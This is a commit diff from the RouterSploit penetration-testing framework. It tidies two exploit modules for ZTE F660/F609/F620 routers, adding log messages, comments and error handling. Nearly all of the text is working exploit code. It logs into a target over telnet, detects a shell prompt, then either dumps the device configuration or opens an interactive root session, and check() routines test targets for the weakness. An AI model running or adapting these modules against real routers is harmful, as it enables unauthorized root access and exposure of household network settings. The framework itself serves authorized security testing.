Cleaning code. Adding little fixes.

fe5da03b · Marcin Bury · ffc36e2b · fe5da03b · fe5da03b
Commit fe5da03b authored May 04, 2016 by Marcin Bury
Showing with 32 additions and 32 deletions

f660_config_disclosure.py routersploit/modules/exploits/zte/f660_config_disclosure.py +17 -17

f6xx_default_root.py routersploit/modules/exploits/zte/f6xx_default_root.py +15 -15

No files found.
--- a/routersploit/modules/exploits/zte/f660_config_disclosure.py
+++ b/routersploit/modules/exploits/zte/f660_config_disclosure.py
@@ -2,9 +2,10 @@ import telnetlib

 from routersploit import (
    exploits,
+    print_status,
    print_success,
    print_error,
-    mute
+    mute,
 )


@@ -17,13 +18,13 @@ class Exploit(exploits.Exploit):
        'name': 'ZTE F660 Config Disclosure',
        'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
        'authors': [
-            'devilscream'  # vulnerability discovery
+            'devilscream',  # vulnerability discovery & routersploit module
        ],
        'references': [
-            'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
+            'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html',
        ],
        'devices': [
-            'ZTE ZXA10 F660'
+            'ZTE ZXA10 F660',
        ]
    }

@@ -34,6 +35,7 @@ class Exploit(exploits.Exploit):

    def run(self):
        try:
+            print_status("Trying to authenticate to the telnet server")
            tn = telnetlib.Telnet(self.target, 23)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
@@ -43,17 +45,19 @@ class Exploit(exploits.Exploit):
            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)

            if i != -1:
-                return False
+                print_error("Exploit failed")
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
-                    print_success("Telnet - Successful authentication")
+                    print_success("Authentication successful")
+                    print_status("Displaying configuration file:")
                    tn.write(self.config + "\r\n")
                    tn.interact()
+                else:
+                    print_error("Exploit failed")

            tn.close()
        except:
-            print_error("Connection Error")
-            return
+            print_error("Connection error: {}:{}".format(self.target, 23))

    @mute
    def check(self):
@@ -69,14 +73,11 @@ class Exploit(exploits.Exploit):
            tn.close()

            if i != -1:
-                return False
+                return False  # target is not vulnerable
            else:
-                if any(map(lambda x: x in res, ["#", "$", ">"])):
-                    if any(map(lambda x: x in res, ["<DM name="])):
-                        tn.close()
-                        return True
-            tn.close()
+                if any(map(lambda x: x in res, ["<DM name="])):
+                    return True  # target is vulnerable
        except:
-            return False
+            return False  # target is not vulnerable

-        return False
\ No newline at end of file
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/zte/f6xx_default_root.py
@@ -2,9 +2,10 @@ import telnetlib

 from routersploit import (
    exploits,
+    print_status,
    print_success,
    print_error,
-    mute
+    mute,
 )


@@ -17,15 +18,15 @@ class Exploit(exploits.Exploit):
        'name': 'ZTE F6XX Default root',
        'description': 'Module exploits ZTE F6XX default root password. If the target is possible to authentiate to the device.',
        'authors': [
-            'devilscream'  # vulnerability discovery
+            'devilscream',  # vulnerability discovery & routersploit module
        ],
        'references': [
-            'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
+            'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html',
        ],
        'devices': [
            'ZTE ZXA10 F660',
            'ZTE ZXA10 F609',
-            'ZTE ZXA10 F620'
+            'ZTE ZXA10 F620',
        ]
    }

@@ -35,6 +36,7 @@ class Exploit(exploits.Exploit):

    def run(self):
        try:
+            print_status("Trying to authenticate to the telnet server")
            tn = telnetlib.Telnet(self.target, 23)
            tn.expect(["Login: ", "login: "], 5)
            tn.write(self.username + "\r\n")
@@ -45,17 +47,18 @@ class Exploit(exploits.Exploit):
            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)

            if i != -1:
-                return False
+                print_error("Exploit failed")
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
-                    print_success("Telnet - Successful authentication")
+                    print_success("Authentication successful")
                    tn.write("\r\n")
                    tn.interact()
+                else:
+                    print_error("Exploit failed")

            tn.close()
        except:
-            print_error("Connection Error")
-            return
+            print_error("Connection error {}:{}".format(self.target, self.port))
    
    @mute
    def check(self):
@@ -71,13 +74,11 @@ class Exploit(exploits.Exploit):
            tn.close()

            if i != -1:
-                return False
+                return False  # target is not vulnerable
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
-                    tn.close()
-                    return True
-            tn.close()
+                    return True  # target is vulnerable
        except:
-            return False
+            return False  # target is not vulnerable

-        return False
\ No newline at end of file
+        return False  # target is not vulnerable